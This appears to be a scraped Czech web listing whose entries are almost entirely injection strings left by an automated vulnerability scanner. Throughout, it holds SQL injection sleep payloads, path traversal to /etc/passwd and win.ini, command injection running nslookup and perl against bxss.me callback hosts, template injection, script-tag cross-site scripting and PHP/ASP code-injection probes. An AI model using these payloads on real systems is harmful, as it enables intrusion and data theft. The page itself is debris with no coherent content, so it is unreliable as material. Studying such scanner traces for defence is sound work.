".gethostbyname(lc("hitsd"."wgibptae247e6.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(80).chr(121).chr(67)."
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu<esi:include src="http://bxss.me/rpb.png"/>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
${9999886+10000249}
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
aDdRVFJreFE=
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
response.write(9233511*9703275)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
"+response.write(9233511*9703275)+"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
";print(md5(31337));$a="
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
aa
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
aaa
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'+'A'.concat(70-3).concat(22*4).concat(99).concat(80).concat(120).concat(68)+(require'socket' Socket.gethostbyname('hittj'+'vgffwwjr95427.bxss.me.')[3].to_s)+'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
a
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
bxss.me
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
bxss.me/t/xss.html?%00
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
aa
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
client
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
client
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
R5LMUxIt
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../../../../../../../../../../../../../../etc/passwd
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../../../../../../../../../../../../../../windows/win.ini
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
echo zozbji$()\ yhepzh\nz^xyu||a #' &echo zozbji$()\ yhepzh\nz^xyu||a #|" &echo zozbji$()\ yhepzh\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|echo ytpdge$()\ hozikd\nz^xyu||a #' |echo ytpdge$()\ hozikd\nz^xyu||a #|" |echo ytpdge$()\ hozikd\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
(nslookup hitsiqsankqapea02d.bxss.me||perl -e "gethostbyname('hitsiqsankqapea02d.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
$(nslookup hitzkbuunbwrr56129.bxss.me||perl -e "gethostbyname('hitzkbuunbwrr56129.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
&(nslookup hitbuvpmsawrb99df4.bxss.me||perl -e "gethostbyname('hitbuvpmsawrb99df4.bxss.me')")&'\"`0&(nslookup hitbuvpmsawrb99df4.bxss.me||perl -e "gethostbyname('hitbuvpmsawrb99df4.bxss.me')")&`'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|(nslookup hithmsfiuqgtm1dc77.bxss.me||perl -e "gethostbyname('hithmsfiuqgtm1dc77.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
`(nslookup hitymgdahlmbn09a66.bxss.me||perl -e "gethostbyname('hitymgdahlmbn09a66.bxss.me')")`
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
<th:t="${acx}#foreach
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx{{98991*97996}}xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx[[${98991*97996}]]xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx__${98991*97996}__::.x
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
-1 OR 2+15-15-1=0+0+0+1
|
|
1. 1. 1967
|
1
|
Pohotovost
před 3 lety
|
Sloučit
|
'.gethostbyname(lc('hitiu'.'dntwigtn8e6af.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(67).chr(98).chr(76).'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
".gethostbyname(lc("hitdb"."vybpbrnh2153e.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(77).chr(98).chr(72)."
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
"+response.write(9545575*9068152)+"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
";print(md5(31337));$a="
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'"()
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu&n987533=v998026
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
"+"A".concat(70-3).concat(22*4).concat(104).concat(71).concat(106).concat(81)+(require"socket" Socket.gethostbyname("hitpf"+"xyziqoxbf9cc2.bxss.me.")[3].to_s)+"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
1some_inexistent_file_with_long_name.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
bxss.me
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
client
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
client
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
client/.
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'.gethostbyname(lc('hitow'.'yuzjdyor53553.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(79).chr(104).chr(79).'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
".gethostbyname(lc("hitpb"."hsduvngb618ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(76).chr(98).chr(77)."
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../../../../../../../../../../../../../../etc/passwd
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../../../../../../../../../../../../../../windows/win.ini
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../GQDWBdMu
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
eUhzeTA2WGI=
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'"()
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
&echo vlcxom$()\ mypdli\nz^xyu||a #' &echo vlcxom$()\ mypdli\nz^xyu||a #|" &echo vlcxom$()\ mypdli\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|echo nivdje$()\ auioqk\nz^xyu||a #' |echo nivdje$()\ auioqk\nz^xyu||a #|" |echo nivdje$()\ auioqk\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
';print(md5(31337));$a='
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
$(nslookup hitdlmvxqocfc16358.bxss.me||perl -e "gethostbyname('hitdlmvxqocfc16358.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'+'A'.concat(70-3).concat(22*4).concat(101).concat(85).concat(99).concat(90)+(require'socket' Socket.gethostbyname('hitih'+'ubwoguvafa474.bxss.me.')[3].to_s)+'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
HttP://bxss.me/t/xss.html?%00
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
bxss.me
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
/xfs.bxss.me
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
<!--
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
client
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'.gethostbyname(lc('hityb'.'oiltgxxldaf44.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(77).chr(109).chr(70).'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu<esi:include src="http://bxss.me/rpb.png"/>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
ZWJTYW92YzA=
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
"+response.write(9611044*9745224)+"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../../../../../../../../../../../../../../etc/passwd
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../../../../../../../../../../../../../../windows/win.ini
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../GQDWBdMu
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu&n971162=v948076
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'"()
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
';print(md5(31337));$a='
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
";print(md5(31337));$a="
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
${@print(md5(31337))}
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'.print(md5(31337)).'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
Http://bxss.me/t/fit.txt
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
!(()&&!|*|*|
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
http://bxss.me/t/fit.txt?.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
client
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
echo kyanmg$()\ vsbbug\nz^xyu||a #' &echo kyanmg$()\ vsbbug\nz^xyu||a #|" &echo kyanmg$()\ vsbbug\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
client/.
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
&echo eyjkjt$()\ hdmbkd\nz^xyu||a #' &echo eyjkjt$()\ hdmbkd\nz^xyu||a #|" &echo eyjkjt$()\ hdmbkd\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|(nslookup hitjllqlnjbjffbb44.bxss.me||perl -e "gethostbyname('hitjllqlnjbjffbb44.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
`(nslookup hitknrubsmbip07a93.bxss.me||perl -e "gethostbyname('hitknrubsmbip07a93.bxss.me')")`
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
<!--
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu9467696
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
6oAE4Dbo
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx[[${98991*97996}]]xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu</title><ScRiPt >jIUN(9251)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../GQDWBdMu
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
&echo ejgrur$()\ ukhdws\nz^xyu||a #' &echo ejgrur$()\ ukhdws\nz^xyu||a #|" &echo ejgrur$()\ ukhdws\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|echo lgmvjo$()\ jbcabh\nz^xyu||a #' |echo lgmvjo$()\ jbcabh\nz^xyu||a #|" |echo lgmvjo$()\ jbcabh\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|(nslookup hitwcuhijnhdy1db2d.bxss.me||perl -e "gethostbyname('hitwcuhijnhdy1db2d.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu'"()&%<acx><ScRiPt >R7rG(9720)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'"()&%<acx><ScRiPt >R7rG(9853)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acu8391<s1﹥s2ʺs3ʹuca8391
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
<%={{={@{#{${acx}}%>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
<th:t="${acx}#foreach
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx[[${98991*97996}]]xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx__${98991*97996}__::.x
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu</title><ScRiPt >R7rG(9331)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'.gethostbyname(lc('hitxi'.'ptkfqqxe2b488.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(74).chr(97).chr(68).'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
response.write(9298513*9829622)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'+response.write(9298513*9829622)+'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
"+response.write(9298513*9829622)+"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
';print(md5(31337));$a='
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
";print(md5(31337));$a="
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu'"()&%<acx><ScRiPt >hLRQ(9966)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'"()&%<acx><ScRiPt >hLRQ(9871)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
${@print(md5(31337))}
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
${@print(md5(31337))}\
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'.print(md5(31337)).'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu9943539
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
<%={{={@{#{${acx}}%>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx__${98991*97996}__::.x
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
HttP://bxss.me/t/xss.html?%00
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
!(()&&!|*|*|
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
^(#$!@#$)(()))******
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
Http://bxss.me/t/fit.txt
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
<!--
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
../../../../../../../../../../../../../../windows/win.ini
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
&(nslookup hitbtrwbicwntae3fd.bxss.me||perl -e "gethostbyname('hitbtrwbicwntae3fd.bxss.me')")&'\"`0&(nslookup hitbtrwbicwntae3fd.bxss.me||perl -e "gethostbyname('hitbtrwbicwntae3fd.bxss.me')")&`'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu'"()&%<acx><ScRiPt >dujn(9926)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
'"()&%<acx><ScRiPt >dujn(9119)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx{{98991*97996}}xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
acx[[${98991*97996}]]xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
-1 OR 2+797-797-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
-1" OR 2+189-189-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
w5AnAMvD'; waitfor delay '0:0:15' --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
-1 OR 2+570-570-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
o2G2fpS9') OR 736=(SELECT 736 FROM PG_SLEEP(15))--
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
GQDWBdMu'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
-1' OR 2+402-402-1=0+0+0+1 or 'HWo55Xhg'='
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
1 waitfor delay '0:0:15' --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
aaa
|
|
1. 1. 1967
|
0
|
|
Sloučit
|